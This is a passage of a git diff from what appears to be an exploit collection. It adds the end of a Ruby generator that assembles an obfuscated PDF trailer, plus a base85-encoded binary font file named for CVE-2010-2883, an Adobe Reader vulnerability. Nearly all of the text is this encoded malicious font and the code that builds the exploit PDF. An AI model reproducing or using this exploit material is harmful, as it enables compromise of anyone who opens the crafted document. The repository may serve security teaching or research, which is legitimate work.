# trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << n_obfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end +end diff --git a/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf b/src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf new file mode 100755 index 0000000000000000000000000000000000000000..58cd6b5e61eff273e920942e28041f8ddcf1e1b5 GIT binary patch literal 65932 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

B-* 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 